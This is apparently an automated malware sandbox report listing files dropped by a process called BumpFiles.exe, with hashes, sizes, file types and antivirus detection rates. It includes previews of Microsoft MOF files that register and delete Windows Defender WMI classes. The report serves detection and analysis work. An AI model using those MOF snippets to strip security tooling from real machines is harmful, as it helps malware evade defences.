                                                                  • Filename: WKYC506_2389030007-00901003007010_777380775_#U00b2.exe, Detection: malicious, Browse
                                                                  • Filename: WKYC506_2389030007-00901003007010_777380775_#U00b2.exe, Detection: malicious, Browse
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):328976
                                                                  Entropy (8bit):6.198120164117354
                                                                  Encrypted:false
                                                                  SSDEEP:6144:xNnWg5R+apw+X7RUi7ugdjklyi7mjSaO8xm6j2n:rWg5R+apw+X7iSJdjklyi7mjSt8Vjm
                                                                  MD5:86C84739AE8836EDADC2631B7D59F29B
                                                                  SHA1:0370932E18368A169C1A84A3F86A305016BA6AF0
                                                                  SHA-256:7AF5A25F7991926C507FA1DDC56639E0242FCB4CBD1E4667EE660E52FE824BA6
                                                                  SHA-512:ABC7E228A1A2C2C48025F40544CF4C79FB044864DB760146886A08234F3212FFE14B7E3E3B5094FC1036444C5E9D5C3C4F28DA1B7D80822A1931BC65ED221773
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                  Joe Sandbox View:
                                                                  • Filename: 0923840932020004-3-0.exe, Detection: malicious, Browse
                                                                  • Filename: WKYC506_2389030007-00901003007010_777380775_#U00b2.exe, Detection: malicious, Browse
                                                                  • Filename: WKYC506_2389030007-00901003007010_777380775_#U00b2.exe, Detection: malicious, Browse
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):1070440
                                                                  Entropy (8bit):5.101220702530903
                                                                  Encrypted:false
                                                                  SSDEEP:6144:JmiTVVmVVV8VVNVVVcVVVxVVVPVVlVVVRVVVtVVWV60jVLVVOVVUVZVVVVVjVVJZ:L/6qa37LS
                                                                  MD5:DD23543F34BBF0FB213A9B94EEAD88C6
                                                                  SHA1:0D86ACF88053E92C148246DBEC2ED57C5873D103
                                                                  SHA-256:11E886100FCCE403D98866CDF32A9DE5FE010DFC092B17B0A05D2598C6822CF8
                                                                  SHA-512:D87B4D7F309F2B0F6FE16803B32BCD6FD053482C705194AB0A93AB341232052AE35DEA60B34166ADB3E81F7E11685FA890AF3F8EB14C14D5159E2C30DD017E0B
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:C source, ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):361
                                                                  Entropy (8bit):4.8940836129092675
                                                                  Encrypted:false
                                                                  SSDEEP:6:j2Lx3wlgQ/B93BXVN+RytwqjOq5ceB0FVAnorAIeRKpLasaT2E/xoOEkyoMy:j2Lx3wlzBJBFN+RZqjOq5XB0GBb9RHxn
                                                                  MD5:CCE6F066104177A368EE528EBF94A170
                                                                  SHA1:25D90A5CC14763FC932A819A1120931C146E0F11
                                                                  SHA-256:58996425ADD2DFC63157CBD618ABB81C722FADCF5E2133D2488DB2840DBF47D5
                                                                  SHA-512:1E3314C5B974D97821AD5CBBC6B2D1529B598D9AD34F10AE61FEAA66625DE6ABC2267E579C59F5B1331A387EE036539C99B7256EF3A24964F5CE748D2C4D98A0
                                                                  Malicious:false
                                                                  Preview:// FepUnregister.mof : mof source for namespace unregisteration..//..// Copyright (c) Microsoft Corporation. All rights reserved...//..// This file will be processed by MOFCOMP utility to..// unregister the provider with the WMI repository..//....#pragma namespace("\\\\.\\root\\Microsoft")..#pragma deleteinstance("__Namespace.Name='SecurityClient'", nofail)..
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):210272
                                                                  Entropy (8bit):5.230229920969571
                                                                  Encrypted:false
                                                                  SSDEEP:6144:HmiTVVmVVV8VVNVVVcVVVxVVVPVVlVVVRVVVtVVWV60jVLVVOVVUVZVVVVVjVVJQ:FOd
                                                                  MD5:566A2EA0F4DE26A845FCB86E2E1FBBDC
                                                                  SHA1:7F09E0AE96C7B6FA922EB44957AFEA88A061C765
                                                                  SHA-256:424AABA98E59CD79F308FAC5D598D165B54006A75B24ECFA0D764B825CFC3565
                                                                  SHA-512:06B480F472F933DA67FBC92F845DF4E2070D57033D4052FD4277606550D2FB1782D35784419624CCF3EE2EE69586B5C8FFA535A35DF1057C377D6FD813DFCE15
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):1418512
                                                                  Entropy (8bit):6.2264061869732945
                                                                  Encrypted:false
                                                                  SSDEEP:24576:8oTyorjq8Iyuxo1Ejy4xdUzhuVStq5QYOPO0Yee55eOh1yLtVcVceu5r:8oTyore8Iy4AEjy4xdUzySC5OPOFee56
                                                                  MD5:D6D75D933B8FADA9C4016428EE8266F7
                                                                  SHA1:2E69B04D7320C590C7E4F8810F5CE5F51A7C3E2F
                                                                  SHA-256:7E2D151DB066EDFD958472D5F9B13113BEE2759306A568CA42A1FF0A3E3F4911
                                                                  SHA-512:410C487FCFF08C7052BFF30EB1CCE78DA4EDD1B3584F2A58173CA7A9B682F6BB528CFD0736F658D061F951326B609A178DD2F8C25016957EEF15A398471B34DA
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):307712
                                                                  Entropy (8bit):6.332720664448543
                                                                  Encrypted:false
                                                                  SSDEEP:6144:WYtMdcvXGRDeyNF203FDpUaXCtohlikEt2U:WYtIRDflDpYos
                                                                  MD5:5C7736509CF1CC99D06D2F9ADA099A75
                                                                  SHA1:52C58A9C7CC5C0A52327F0F84B43E3984AA54135
                                                                  SHA-256:4B8D7E016AC84D73D5747CC84847F4CC0583B185FE636E3CCD3E1F713650425D
                                                                  SHA-512:539232DC40158ADA718E090A732D62FF574C1259D6F8C812911E49BD1DFCE8E406455F7160D39335893EF6C77DC3F29ABA7F0AFA75CE2E2E767C02563D347158
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: Virustotal, Detection: 11%
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):26721983
                                                                  Entropy (8bit):1.4876745712622361
                                                                  Encrypted:false
                                                                  SSDEEP:49152:XeQVBh0T2P8dpyCmvMXhWDyrNNmFfSewJep3V7XoJ//lKkTjyVcg:OQVVkmvahxhd1XyVc
                                                                  MD5:0F0AC6E9ABA9C88702921DB11C4B2EB8
                                                                  SHA1:9FEBA58C87C1C717918E183DF99172AF0E1118BE
                                                                  SHA-256:07A244E97090B0159C703F870D8F1B54EC3237E517118FB0318DDE982CEF2787
                                                                  SHA-512:4DDB7459752930A46174B6F460F49F40C70217FF5748C4EDB7D6D3E8F53478D2C487D1F1D575581DE42911210FA167E2A33719B3A9D5A71CE6A8124101F158E6
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Virustotal, Detection: 7%
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):925848
                                                                  Entropy (8bit):6.085579436536139
                                                                  Encrypted:false
                                                                  SSDEEP:12288:kI8/UlbzMwl5E5tbcklE1WcHTWYmj8rzm/xsdO/05e7+ew7l:kIkwMPEgcHS/j8ruxsdO2FJ
                                                                  MD5:4F2C9892C74315AD23E03A84FC3C15CD
                                                                  SHA1:8F1B56DE4487610611442B91052B165AC25ACDF8
                                                                  SHA-256:09C6A18F0DEF6FB156DFF6F8EF3EAC3F27A23BE141338E21EADDA093B84AB0F2
                                                                  SHA-512:B245243360C900AAA7A47CC3AC06BF56617A9C5BBB83F9BE62C547E6A4C97DF23E677F9A7B0CADC21D3D1F82E24738D54BE1604E77F453F6FC9A4CE46B811431
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):353552
                                                                  Entropy (8bit):6.063609490596869
                                                                  Encrypted:false
                                                                  SSDEEP:6144:tdIqN/NLP6m0KBU19MCIOD6zhhsP1nhUOqM:wi/OXGhYrqM
                                                                  MD5:5C77DC919514E716498065E898A24030
                                                                  SHA1:2EF9CFF55BE5F8DF08CDD735773130EDBF6FF071
                                                                  SHA-256:69BBFE4113FAD42B74A4039EDAC0C8BEA7C558DD22C1D7A284163EFC190FDC95
                                                                  SHA-512:06D9C9AF52411DAAE72DDD9628A867F15E24F856507A54D3E3B6CDE7775BE6CB0663CF78CAD82CE1E4AC5542CE2EF4CAB88A4D770A3BEA774780543E8A6825C4
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):165560
                                                                  Entropy (8bit):5.404976368456962
                                                                  Encrypted:false
                                                                  SSDEEP:1536:UMrr7HamDZjuGzV+J0fG9uKPxONFKTeWvOCzAt1di5ku1RQpy55Pxx:NKiZyGzEKoANFKTeAzAD85ku1S85r
                                                                  MD5:BF16294ABC456381F5F8C8BA7CA68933
                                                                  SHA1:762B74924FAACA7CE2DFA1DA78E5076D4FF7CF62
                                                                  SHA-256:1241F24AC9C5A111F21C5CEF831A5881A5C06229E09D158CBF2AC54E41C4E1C9
                                                                  SHA-512:3110E14522BE93B5C9B6193B29B36553A3CE81192BFC33DEA0617768873A8F23BA33260FECE074E38BF82723EEE246F1000BE61A9FDCF8A5C0A09FF08C9F47CB
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):165136
                                                                  Entropy (8bit):5.919968753776253
                                                                  Encrypted:false
                                                                  SSDEEP:3072:SbKF9Ch4oIM5qO2j+1L4BitdPhPIBcV0YnoC4PlS/KB8cV2j6jaV4:S+nCZIM1Ld7hgjWoXYcV7z
                                                                  MD5:F05E8D6365BF5A5218071548F5E687A0
                                                                  SHA1:B132FE303519E4BE50A547D6A6FE8AF359C8D335
                                                                  SHA-256:657A136378B351C50C2D60D425210021C8FE0BB9E8B998320163CC09339899AC
                                                                  SHA-512:B09B0FE1693F2B726B56CE745EF949CDE3A0D2412D763F3F84FEBAD3C4D28A0FDB6ED40CA55EFB0D8AEB5EF410402F42229F06583EC9B1572D477029141B7FFF
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):103672
                                                                  Entropy (8bit):5.463582216147117
                                                                  Encrypted:false
                                                                  SSDEEP:1536:9QyB1n0kg+iFMx3/TOw987XxhLTdCfDQl/0agrW7mPfp5PRnNazo:pn0k8FM5/TOw27XTdCfDW8nNPfp5pNa8
                                                                  MD5:5B57B2C8291FE382F8F87E91A19B5BB9
                                                                  SHA1:0B4224F7DA53BF49A1A822DA111464B185657A8A
                                                                  SHA-256:48732B6B8C62DAEA68F2C38EEDEEA59DA2F142403AF9EE0D8D77181BDD22BBD1
                                                                  SHA-512:4E2012B7C19319A97F4AAA7C94DD7427C850B30EAD8E679F8140AF60724AEACDFA943BA9501D456F66DB08E2325772B90F2F8E5502AB63909F5F4BED97FEC8BF
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):373224
                                                                  Entropy (8bit):5.820010710818714
                                                                  Encrypted:false
                                                                  SSDEEP:6144:zbkK5UHrNrsedr+z0nsqBmiTVVmVVV8VVNVVVcVVVxVVVPVVlVVVRVVVtVVWV60R:eNgGr+Wjl
                                                                  MD5:9CA81B59C17591C8B09AF4D753A28020
                                                                  SHA1:95D7494686DFA1701FEF297944EBA28B06380931
                                                                  SHA-256:98EFF3DF7B16B9743B4F5A89F163406946E8C42229DEFCEB77E26BB5B2FF307A
                                                                  SHA-512:C782A8C01B12CBCDB77D49224D04D386E0EC68F66789C9970370CC68BDD0270ADAE8D3DE52AFF821189BC1BA96231FA283489854E3AF7D67ADEB4BDE3FA52D8D
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):144728
                                                                  Entropy (8bit):3.894814306787259
                                                                  Encrypted:false
                                                                  SSDEEP:768:w81RWuK37OeBkG22Tumo0cTH6QKqCmuKqrWmNKq4mZKqdmjd4KqgmXRrL1PemM9t:wssBkG2usKfPeFz
                                                                  MD5:E49B09EAC7BD3C5B71B0F33E72A2CF34
                                                                  SHA1:61F5B81BF0C81090098806B2EF3C8EF895504AD9
                                                                  SHA-256:E9C233A28F49690339710143FDC146FAA9B73E89A8D828CC026F7246C5CED71E
                                                                  SHA-512:2E75983DD7FE9FFB73A5CCE89A6A0C19489A4ADBAC0D6B68AB53B08CF12D3D9BE7FC139E8C7B9CCD37FF07B5B24E7D9CAEDAFACFCBE3CC3351C504AA8AE564A3
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):496912
                                                                  Entropy (8bit):6.014056505362478
                                                                  Encrypted:false
                                                                  SSDEEP:6144:UTmg/KSnLsE0aGPrR4IcdwSbttHRqJULrf6KmiTVVmVVV8VVNVVVcVVVxVVVPVVQ:UxSrR4Ic7bttxqJULrTj
                                                                  MD5:82D45EE8BCA40389EA79879C75EC6207
                                                                  SHA1:86108949630649367EA91153EEE86F2FDC9F2489
                                                                  SHA-256:CE0B09D43134DD41BA555AAF18DD491EC610DD503864CAF7BFFF60AFB73F8ED5
                                                                  SHA-512:8E03CC2B53635BBA4D3AB21946C20D91B8387BE0FDEF700A893104AD5153CAF2632A1D51766DEBCA6A05C35F15B40F08A20EE52FD154938D930406C0A8F354EE
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):202072
                                                                  Entropy (8bit):5.957890458465426
                                                                  Encrypted:false
                                                                  SSDEEP:3072:H/5F5VF0f8aKwRRw9XOfCAbP+A+TQ3KTeWxFYapr7Du2pe:H/5Fp0fThRRw9+fCAldmFYMpe
                                                                  MD5:4987F9EFD8B2E414801BB322400D2BFD
                                                                  SHA1:A1AAA1743D7927D667EDC74A36B1A8EFF5FE2470
                                                                  SHA-256:08789F41E50D75EADBDF097494D9AD66B26FED684501E99B5E219CA7FDE0489D
                                                                  SHA-512:FFDCEE1706AE0E02D8E79D3775EEF40E86B331CE186EEB0BB897ACF70AB85260C2AED15DBAA3AD93161A159202D1004A149A30573D5CC83AE249A3DEE17C4CBF
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):1619192
                                                                  Entropy (8bit):6.3400930707756755
                                                                  Encrypted:false
                                                                  SSDEEP:24576:uLLxAt3sZG5yM+SrnrwrTqfb8BPVEGAUFSCJMb1ierG:ko8ZGk8nEqfoBPqdUFrMb1ieq
                                                                  MD5:59CD6F03A00980D8ADBF42EFBB9FFFD8
                                                                  SHA1:F5471A156DDDC69799782E3FE0D72FD6E8D0F085
                                                                  SHA-256:A6D588A8EC27E9294C52BA9ABE5DD1FC7C99E129B7CAF9C19F39FF6ECA236B0A
                                                                  SHA-512:49D69D9C19342985B0E520868F7745A4B515EF2EC5778372E266978A9FE690BC3BEF37CB0CA2B513D829B82D92A4D04C8143B594ABF83A3082B86324EE6B0A8E
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):3282192
                                                                  Entropy (8bit):6.315630312982859
                                                                  Encrypted:false
                                                                  SSDEEP:98304:rGo+pTlHiqauRMwGM2CEwCaCEaC3CE8CYPpCGnCqCEPCBCEPCjY:rGo+pTlHiqP/G7Y
                                                                  MD5:3767B51F5D134FD6A459F2F30C87ED14
                                                                  SHA1:33DEC014E1CB9A3B6BF4F3D037935C3E7E39904A
                                                                  SHA-256:203E41C2321D802387381D4F003EA49884A0CA0BF61ADF7D103992B0D529932C
                                                                  SHA-512:7E5AE6E6BC9E5E9A70E5A1C3B37707EDB6CE62266B59AD452E2A2F27008BA0F51661E46095130DBD04CA62C7E10F087B51F6D41FDA04CB19D0A806FE2D4A581B
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):107880
                                                                  Entropy (8bit):5.399183517403788
                                                                  Encrypted:false
                                                                  SSDEEP:3072:/+V443d04OzmE9ww+vKTebKJy5zeWKGo3:/+V443d05n9rwKw5zNQ
                                                                  MD5:5020E4A4321476F7DE557F75CBC87438
                                                                  SHA1:6F135DE3D7A2FF90AF6401E5C01FCC282B0A4108
                                                                  SHA-256:41E3B40B6B8472380568BCF75FB493515DBAF63BF948F9DA9267F459D422F78F
                                                                  SHA-512:7AA722B45373F82F5ED8F6559D149E3DD72A00CB942D39BA2B0F584FF6FABFB62B1A0A52195298389CB2C698DA4E62F2D78DDE2DF46FF1183BA0F2118A2297C5
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):128376
                                                                  Entropy (8bit):5.778415627793409
                                                                  Encrypted:false
                                                                  SSDEEP:3072:svVXrm01KTBVOm81W0z3J8EfKTee1YzFw/x65B:svBjiBVOmGJJ0kFaw3
                                                                  MD5:2C2714BAB4E11FD6865DDF8B501A212D
                                                                  SHA1:9B5D52CB7A6CF62B83A36566DEAD2C28B0D1A96E
                                                                  SHA-256:0C60E5D6BB49E1F85DEA4305BCB2308708A11A8A2C228D0C1F3F41BE79AF09C2
                                                                  SHA-512:73ECA7073D9ECB8015C23E494D948C1D50A32CF96D2E0190D08FD48A69F725DCE35D2A6506FAF037FB42405A55DBF22A7776068BD30811721AC086C04A65001C
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):21776
                                                                  Entropy (8bit):4.731417909543677
                                                                  Encrypted:false
                                                                  SSDEEP:192:7rFQWgZHWAALc2Fu462TNbvRpSDBQABJw5Wayks9gICQX01k9z3AbwmN:7rFQWgZHWA1MJ16DBRJwLy/P/R9zlmN
                                                                  MD5:0613DECA278E353EBC96493895754CCE
                                                                  SHA1:D72682AE6E077DE106235D9C236B2C7F744E2DBC
                                                                  SHA-256:D84E4315C6121FA8F8D4D477FF8C70AC899EC29CF7EE10CCD1BE1A01E7E57D9E
                                                                  SHA-512:275A7A398EA6DA4284489C437D8EB0FFA3C7FEAA299235AF92CF3E8AFB78E5487337F4B5C7544C9CFBC2AAE90BAEFDF02417C6E9125BE8BA98902464AD766CD9
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):21856
                                                                  Entropy (8bit):4.482734780628967
                                                                  Encrypted:false
                                                                  SSDEEP:192:nrWNzOWPicCroDBQABJ54pZMMBdRgjLX01k9z3AzslM1Y3qq:rWNzOWPbDBRJGTleLR9zusloYZ
                                                                  MD5:9EEE260CF0F752D4595E51AF7EBD8B6A
                                                                  SHA1:1544C414D1240AC4F8FED45551EA061CD4665721
                                                                  SHA-256:49FA47F6F2444DC2235813961ED8395D04F86B9DF3EA08882BFFED4EAD3502F4
                                                                  SHA-512:27EDB26E104294A9DB70A4B58930220694E877DF808D4838DBDC2516BAEB5BF996C759446BE18855F52D424CDB3B5BFDD26B64B087AF167ABD661FC7C5CAEE17
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):2909208
                                                                  Entropy (8bit):6.442167136448819
                                                                  Encrypted:false
                                                                  SSDEEP:49152:LJlKh3CsTiIy0vAayl+xFJCPg3gUZ/RG6XICg:DIPlIn
                                                                  MD5:852AAE2F9F2F13FD6AECC1E1817D8BF1
                                                                  SHA1:548C65353A1A7ACFA4CCF72F94571FEEB533AB44
                                                                  SHA-256:6BFE5B785D96525C9F060474837A83434E9EEAB498A07396C5EDB7EA925BF8B9
                                                                  SHA-512:3A7F1D8FD4D0D779383697632E3B00B803E510719AA80130337EFA7C6AB94418C3DD1315B866D4E9B2F4028777DE1229B1BD8057129C89D2778DEF1F465F95D2
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):738576
                                                                  Entropy (8bit):6.022878886310737
                                                                  Encrypted:false
                                                                  SSDEEP:12288:iQo3VmVdaveWcQRUtwywRXT349/gehVTef1YecoFW3h07EVd:U4VdamQRamXGef63ou0EVd
                                                                  MD5:CFC96445CC630E00935A8A74875BD45C
                                                                  SHA1:5572055932156EA9F569ACB1CFC0E714373765D6
                                                                  SHA-256:D132DE7BFAFDA6F0A9CFA4A829892FBA6C531D721C4A1BA9918BD5553BA0336B
                                                                  SHA-512:92E737A59BE464ADB5152C4406E76578CC70FECE2E58EAA845A654A1A70BBDBF7EB57B3079179C8666944111FEEB59E3D54F0CDC61B7F5639BEC62D31B851B46
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:C source, Unicode text, UTF-16, little-endian text, with very long lines (4929), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):94958
                                                                  Entropy (8bit):3.592146871128743
                                                                  Encrypted:false
                                                                  SSDEEP:768:hvQJc7QeBhFbUAbYzlyZCvQJc7QeBhFbUAbYzlyZg:uMbgyLMbgya
                                                                  MD5:4B23206905E11134BEB571548C245F3C
                                                                  SHA1:3E0AE50991CD2422E1C2FDCC9C6F6DF8EAB18FEC
                                                                  SHA-256:2CF7F8EF415A75427E90C50BC18BF5FBE25398A3E805A08F0DA5DEEB48C7CCA1
                                                                  SHA-512:9A758F7C1BC185EDE944CDC6A12B2664F5A1EBC31623FE40C469E317199D5A93E8CCB786042C4012D3ED3D57E271C853D60019D516BA399430ACEBD4BE938E5D
                                                                  Malicious:false
                                                                  Preview:
                                                                  #pragma autorecover
                                                                  #pragma namespace("\\\\.\\root\\Microsoft\\Windows\\Defender")

                                                                  Instance of __Win32Provider as $prov
                                                                  {
                                                                    Name = "ProtectionManagement";
                                                                    ClsId = "{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}";
                                                                    ImpersonationLevel = 1;
                                                                    HostingModel = "LocalServiceHost";
                                                                    version = 1073741825;
                                                                  };

                                                                  Instance of __MethodProviderRegistration
                                                                  {
                                                                    Provider = $prov;
                                                                  };

                                                                  Instance of __EventProviderRegistration
                                                                  {
                                                                    Provider = $prov;
                                                                    eventQueryList = {"select * from MSFT_MpEvent"};
                                                                  ...
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:C source, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):2664
                                                                  Entropy (8bit):3.464075447819169
                                                                  Encrypted:false
                                                                  SSDEEP:24:QXbclfUWvlDQzj3WvlDQzCWvlDQzwNWvlDQzYTYWvlDQzSJjWvlDQzfWvlDQzyWU:eTjDGwJ3SJnr24RFZ7a2la2Sa2mWaWP
                                                                  MD5:C4E26C53F76774E091FEE17FFFF64414
                                                                  SHA1:5CB3AD07CF6DFF3DB5BAAD55488A769A664BC093
                                                                  SHA-256:5172863C41E84024799B2034D42F10E9720FC53171A4F6C1CA2FDB2C6F71DFE9
                                                                  SHA-512:635DE182629A248B9BF3061E1A1C1D3ED904B8843187B64CEB3BF96DD4B10769D9E001EAEECED2179350F7012C82317B2C833A8501FF9C92D1A0CE94C711FEBB
                                                                  Malicious:false
                                                                  Preview:
                                                                    #pragma namespace ( "\\\\.\\root\\Microsoft\\Windows\\Defender")
                                                                    #pragma deleteclass("MSFT_MpComputerStatus",nofail)
                                                                    #pragma deleteclass("MSFT_MpEvent",nofail)
                                                                    #pragma deleteclass("MSFT_MpHeartBeat",nofail)
                                                                    #pragma deleteclass("MSFT_MpPreference",nofail)
                                                                    #pragma deleteclass("MSFT_MpRollback",nofail)
                                                                    #pragma deleteclass("MSFT_MpScan",nofail)
                                                                    #pragma deleteclass("MSFT_MpSignature",nofail)
                                                                    #pragma deleteclass("MSFT_MpThreat",nofail)
                                                                    #pragma deleteclass("MSFT_MpThreatCatalog",nofail)
                                                                    #p
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):165208
                                                                  Entropy (8bit):7.110142692986595
                                                                  Encrypted:false
                                                                  SSDEEP:3072:vMxVQoQqFTs8U+Nwy8bhpgENIf5eeT25+h6+iU:v8s8tNwZhpgEKfEeT6m
                                                                  MD5:EBEA28C15DD26C1D0C1944215F0AAE8B
                                                                  SHA1:98375B311B8D56DA260961217073B30D1AEFE089
                                                                  SHA-256:E36CD8ABDA4C1E71C9E322550ECD3F6B76B1D6ACAD014F7DFA11F72A0ABC674B
                                                                  SHA-512:05E17C27A257229BD67096D0E2858C9A120293983F8F79AA9A884F97A4F867A00AD1ED7DEC846EC54F236B44802B7A6C57E752B81277510B90F930BDB6714F11
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
